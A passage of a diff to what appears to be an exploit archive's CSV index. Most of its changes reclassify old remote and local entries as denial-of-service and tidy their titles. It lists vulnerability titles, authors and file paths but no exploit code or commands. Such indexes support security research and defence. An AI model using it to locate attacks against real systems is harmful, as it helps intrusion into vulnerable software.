id,file,description,date,author,platform,type,port 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration Vulnerability",1999-10-05,KSR[T],hardware,remote,0 19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 IFRAME Vulnerability",1999-10-11,"Georgi Guninski",windows,remote,0 19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal Vulnerability",1999-10-08,"Jason Lutz",windows,remote,0 -19541,platforms/novell/remote/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,remote,0 +19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,dos,0 19542,platforms/sco/local/19542.txt,"SCO Open Server <= 5.0.5 - 'userOsa' symlink Vulnerability",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow Vulnerability",1999-10-08,"Brock Tellier",sco,local,0 19544,platforms/linux/local/19544.c,"BSD/OS 2.1_FreeBSD <= 2.1.5_NeXTstep 4.x_IRIX <= 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0 @@ -16941,8 +16941,8 @@ id,file,description,date,author,platform,type,port 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".Net Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,metasploit,windows,remote,0 -19577,platforms/windows/remote/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1)",1999-10-31,nas,windows,remote,0 -19578,platforms/windows/remote/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,remote,0 +19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)",1999-10-31,nas,windows,dos,0 +19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 Privileged Program Debugging Vulnerability",1999-12-10,"Brock Tellier",sco,local,0 19675,platforms/linux/local/19675.c,"Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 Packet Length with Options Vulnerability",1999-12-08,"Andrea Arcangeli",linux,local,0 @@ -16964,7 +16964,7 @@ id,file,description,date,author,platform,type,port 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilties",1999-11-03,Kerb,windows,remote,0 -19596,platforms/windows/remote/19596.txt,"Byte Fusion BFTelnet 1.1 Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,remote,0 +19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,dos,0 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 @@ -16982,8 +16982,8 @@ id,file,description,date,author,platform,type,port 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0 -19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 -19616,platforms/windows/remote/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Buffer Overflow Denial of Service",1999-11-08,Interrupt,windows,remote,0 +19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0 +19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server DoS Vulnerability",1999-11-10,"Ussr Labs",windows,dos,0 @@ -17001,12 +17001,12 @@ id,file,description,date,author,platform,type,port 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow Vulnerabilities",1999-11-13,scut,linux,remote,0 -19635,platforms/solaris/remote/19635.c,"Sun Solaris 7.0 rpc.ttdbserver Denial of Service Vulnerability",1999-11-19,"Elias Levy",solaris,remote,0 -19636,platforms/windows/remote/19636.txt,"Dick Lin ZetaMail 2.1 Login DoS Vulnerability",1999-11-18,"Ussr Labs",windows,remote,0 +19635,platforms/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service Vulnerability",1999-11-19,"Elias Levy",solaris,dos,0 +19636,platforms/windows/dos/19636.txt,"Dick Lin ZetaMail 2.1 - Login DoS Vulnerability",1999-11-18,"Ussr Labs",windows,dos,0 19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability",1999-11-22,"Georgi Guninksi",windows,remote,0 -19638,platforms/windows/remote/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability",1999-11-19,"Kevork Belian",windows,remote,0 +19638,platforms/windows/dos/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 - NULL Data DoS Vulnerability",1999-11-19,"Kevork Belian",windows,dos,0 19639,platforms/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow DoS Vulnerability",1999-11-24,"Ussr Labs",windows,dos,0 -19640,platforms/windows/remote/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL DoS Vulnerability",1999-11-26,"Ussr Labs",windows,remote,0 +19640,platforms/windows/dos/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL DoS Vulnerability",1999-11-26,"Ussr Labs",windows,dos,0 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 Xsco Buffer Overflow Vulnerability",1999-11-25,K2,sco,local,0 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 xlock(1) (long username) Buffer Overflow Vulnerability",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 su(1) Buffer Overflow Vulnerability",1999-10-30,K2,sco,local,0 @@ -17030,7 +17030,7 @@ id,file,description,date,author,platform,type,port 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing Vulnerability",1999-11-30,"Georgi Guninski",windows,remote,0 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop (print_domain_name) Buffer Overflow Vulnerability",1999-12-07,K2,solaris,remote,0 -19664,platforms/windows/remote/19664.txt,"Cat Soft Serv-U 2.5 a Server SITE PASS DoS Vulnerability",1999-12-02,"Ussr Labs",windows,remote,0 +19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5 a - Server SITE PASS DoS Vulnerability",1999-12-02,"Ussr Labs",windows,dos,0 19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5.0 - vnd.ms.radio URL Vulnerability",1999-12-06,"Jeremy Kothe",windows,local,0 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 DoS Vulnerability",1999-12-06,"Ussr Labs",windows,dos,0 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow Vulnerability",1999-12-09,"Amanda Woodward",multiple,remote,0 @@ -17042,7 +17042,7 @@ id,file,description,date,author,platform,type,port 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow Vulnerability",1999-12-13,UNYUN,windows,local,0 19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT GET Buffer Overflow Vulnerability",1999-12-15,"Ussr Labs",windows,remote,0 19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 i2odialogd Remote Buffer Overflow Vulnerability",1999-12-22,"Brock Tellier",sco,remote,0 -19681,platforms/solaris/remote/19681.txt,"Solaris 7.0 DMI Denial of Service Vulnerabilities",1999-12-22,"Brock Tellier",solaris,remote,0 +19681,platforms/solaris/dos/19681.txt,"Solaris 7.0 - DMI Denial of Service Vulnerabilities",1999-12-22,"Brock Tellier",solaris,dos,0 19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server _Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 Weak Password Encryption Vulnerability",1999-12-19,"Mike Davis",windows,local,0 19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5_IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library Buffer Overflows Vulnerability",1999-12-20,"Last Stage of Delirium",multiple,local,0 @@ -17056,13 +17056,13 @@ id,file,description,date,author,platform,type,port 19692,platforms/multiple/local/19692.c,"Netscape Communicator 4.5 prefs.js Buffer Overflow Vulnerability",1999-12-24,"Steve Fewer",multiple,local,0 19693,platforms/linux/local/19693.txt,"Python Untrusted Search Path/Code Execution Vulnerability",2012-07-09,rogueclown,linux,local,0 19694,platforms/unix/remote/19694.txt,"AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal Vulnerability",1999-12-29,"Rudi Carell",unix,remote,0 -19695,platforms/windows/remote/19695.txt,"Michael Lamont Savant WebServer 2.0 NULL Character DoS Vulnerability",1999-12-28,"Ussr Labs",windows,remote,0 +19695,platforms/windows/dos/19695.txt,"Michael Lamont Savant WebServer 2.0 - NULL Character DoS Vulnerability",1999-12-28,"Ussr Labs",windows,dos,0 19696,platforms/solaris/remote/19696.c,"Hughes Technologies Mini SQL (mSQL) 2.0.11 w3-msql Buffer Overflow",1999-10-28,Zhodiac,solaris,remote,0 19697,platforms/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 Race Condition Vulnerability",1999-12-27,"Brock Tellier",unix,local,0 19698,platforms/linux/local/19698.txt,"Great Circle Associates Majordomo 1.94.4 - Local resend Vulnerability",1999-12-28,"Brock Tellier",linux,local,0 19699,platforms/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter Vulnerability (1)",1999-12-29,Shevek,linux,local,0 19700,platforms/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter Vulnerability (2)",1999-12-29,morpheus[bd],linux,local,0 -19701,platforms/linux/remote/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 ETRN Denial of Service Vulnerability",1999-12-22,"Michal Zalewski",linux,remote,0 +19701,platforms/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service Vulnerability",1999-12-22,"Michal Zalewski",linux,dos,0 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability",1999-12-31,"Ussr Labs",windows,dos,0 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0 @@ -17109,7 +17109,7 @@ id,file,description,date,author,platform,type,port 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability",2000-02-04,"Iain Wade",cgi,remote,0 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy DoS Vulnerability",2000-02-04,"Chicken Man",novell,dos,0 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x Null Terminated Strings Vulnerability",2000-02-08,"Vanja Hrustic",cgi,remote,0 -19748,platforms/windows/remote/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 RETR DoS",2000-02-10,"Nobuo Miwa",windows,remote,0 +19748,platforms/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR DoS",2000-02-10,"Nobuo Miwa",windows,dos,0 19749,platforms/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x Traffic Amplification and NS Route Discovery Vulnerability",2000-02-14,Sebastian,multiple,remote,0 19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 DoS Vulnerability",2000-02-11,eth0,multiple,dos,0 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 @@ -17138,14 +17138,14 @@ id,file,description,date,author,platform,type,port 19777,platforms/windows/dos/19777.txt,"IE 9_ SharePoint_ Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 -19780,platforms/multiple/remote/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,remote,0 +19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,dos,0 19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group EZShopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 DoS Vulnerability",2000-02-28,"Jon Hittner",windows,dos,0 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 GET Request Vulnerability",1999-08-25,"ISS X-Force",windows,dos,0 19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD Authentication Vulnerability",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 Input Validation Vulnerability",2000-03-02,"Jonathan Leto",cgi,remote,0 -19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 DoSemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0 +19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - DoSemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0_SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest <= 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 @@ -17176,9 +17176,9 @@ id,file,description,date,author,platform,type,port 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal Vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19_Debian 2.x_RedHat 6.x_S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 -19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99_RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0 +19818,platforms/linux/dos/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99_RedHat 6.x - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0 19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read Vulnerability",2000-03-27,"Quan Peng",windows,remote,0 -19820,platforms/windows/remote/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 DoS Vulnerability",2000-03-25,"Presto Chango",windows,remote,0 +19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - DoS Vulnerability",2000-03-25,"Presto Chango",windows,dos,0 19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 - Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0 19822,platforms/irix/remote/19822.c,"SGI IRIX 5.x/6.x Objectserver Vulnerability",2000-03-29,"Last Stage of Delirium",irix,remote,0 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0 @@ -17208,7 +17208,7 @@ id,file,description,date,author,platform,type,port 19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 - Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0 19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0 -19850,platforms/linux/local/19850.c,"RedHat Linux 6.x X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,local,0 +19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A crypt() Vulnerability",2000-04-15,Sean,qnx,local,0 19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 @@ -17228,7 +17228,7 @@ id,file,description,date,author,platform,type,port 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow Vulnerability",2000-04-23,"Andrew Hobgood",linux,remote,0 19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0_ RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 -19870,platforms/linux/local/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,local,0 +19870,platforms/linux/dos/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,dos,0 19871,platforms/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall Port 67 Vulnerability",2000-04-24,"Wally Whacker",windows,remote,0 19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (1)",2000-04-24,DiGiT,solaris,local,0 19873,platforms/solaris/local/19873.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 @@ -17273,17 +17273,17 @@ id,file,description,date,author,platform,type,port 19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0 19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 -19919,platforms/hardware/remote/19919.c,"Cisco 7xx Series Router DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,remote,0 +19919,platforms/hardware/dos/19919.c,"Cisco 7xx Series Router - DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,dos,0 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 -19923,platforms/hardware/remote/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 DoS Vulnerability",2000-05-17,cassius,hardware,remote,0 +19923,platforms/hardware/dos/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 - DoS Vulnerability",2000-05-17,cassius,hardware,dos,0 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0 19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - CSRF Add Admin",2012-07-18,DaOne,php,webapps,0 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 Filetype Vulnerability",2000-05-13,http-equiv,windows,remote,0 -19965,platforms/multiple/remote/19965.txt,"HP JetAdmin 6.0 Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,remote,0 +19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,dos,0 19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 @@ -17321,7 +17321,7 @@ id,file,description,date,author,platform,type,port 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 19973,platforms/windows/remote/19973.txt,"Fastraq Mailtraq 1.1.4 - Multiple Path Vulnerabilities",2000-03-22,Slash,windows,remote,0 -19974,platforms/windows/local/19974.c,"Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability",2000-05-31,"Kit Knox",windows,local,0 +19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - DoS Vulnerability",2000-05-31,"Kit Knox",windows,dos,0 19975,platforms/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability",2000-05-31,"H D Moore",windows,remote,0 19976,platforms/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Buffer Overflow Vulnerability",2000-06-01,"Delphis Consulting",windows,remote,0 19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta View-Source DoS Vulnerability",2000-06-01,"Ussr Labs",multiple,dos,0 @@ -17352,8 +17352,8 @@ id,file,description,date,author,platform,type,port 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability",2000-06-07,"Stan Bubrouski",linux,local,0 -20005,platforms/windows/remote/20005.c,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,remote,0 -20006,platforms/windows/remote/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,remote,0 +20005,platforms/windows/dos/20005.c,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,dos,0 +20006,platforms/windows/dos/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,dos,0 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - CSRF - rce",2012-07-21,muts,linux,remote,0 @@ -17361,7 +17361,7 @@ id,file,description,date,author,platform,type,port 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption Vulnerability",2000-06-07,Phate.net,windows,local,0 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow Vulnerability",2000-06-01,Syzop,linux,local,0 20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore Buffer Overflow Vulnerability",2000-06-14,"Job de Haas of ITSX",solaris,local,0 -20015,platforms/windows/remote/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 DoS Vulnerability",2000-07-15,"Ussr Labs",windows,remote,0 +20015,platforms/windows/dos/20015.txt,"AnalogX 